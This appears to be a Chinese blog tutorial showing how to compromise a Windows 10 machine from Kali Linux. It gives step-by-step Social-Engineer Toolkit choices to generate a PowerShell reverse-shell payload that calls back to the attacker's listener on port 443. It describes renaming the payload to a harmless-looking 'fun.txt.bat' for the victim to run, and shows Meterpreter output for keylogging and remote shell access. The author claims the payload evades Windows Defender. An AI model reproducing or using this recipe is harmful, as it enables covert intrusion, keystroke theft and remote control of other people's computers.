*** 最新 win10系統(請勿用於非法操作!!!)

使用工具 kali linux

 

root@kali:~# setoolkit

 

Do you agree to the terms of service [y/n]: y

 

set> 1

 

set> 9

 

set:powershell>1

 

set> IP address for the payload listener (LHOST): 192.168.1.110       (kali linux的ip地址)

 

set:powershell> Enter the port for the reverse [443]:443

 

 

set> Do you want to start the listener now [yes/no]: : yes

 

新生成的病毒文件

 

msf exploit(handler) > ls -ll /root/.set/reports/powershell/

 

[*] exec: ls -ll /root/.set/reports/powershell/

 

total 12

 

-rw-r--r-- 1 root root  128 Mar  7 22:26 powershell.rc

 

-rw-r--r-- 1 root root 6773 Mar  7 22:26 x86_powershell_injection.txt

 

改名字x86_powershell_injection.txt 爲fun.txt.bat

 

將fun.txt.bat文件傳給win10,並運行

 

Kali上可以 看到以下

 

msf exploit(handler) > [*] Sending stage (957999 bytes) to 192.168.1.94

 

[*] Meterpreter session 1 opened (192.168.1.110:443 -> 192.168.1.94:50499) at 2017-03-07 22:46:45 -0500

 

回車

 

msf exploit(handler) > sessions

 

 

 

Active sessions

 

===============

 

 

 

  Id  Type                   Information              Connection

 

  --  ----                   -----------              ----------

 

  1   meterpreter x86/win32  sh-270\slls @ SH-270  192.168.1.110:443 -> 192.168.1.94:50499 (192.168.1.94)

 

 

 

msf exploit(handler) > sessions -i 1

 

[*] Starting interaction with 1...

 

meterpreter > help

 

meterpreter > keyscan_start

 

Starting the keystroke sniffer...

 

在win10中的輸入,已經能被kali截取如下。

 

meterpreter > keyscan_dump

 

Dumping captured keystrokes...

 

這個病毒今天最新windows 10自帶的defender檢測不到。

 

 

meterpreter > shell

 

Process 9424 created.

 

Channel 1 created.

 

Microsoft Windows

 

(c) 2016 Microsoft Corporation

 

C:\Users\Desktop>dir            (已經成功登陸)

 


發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章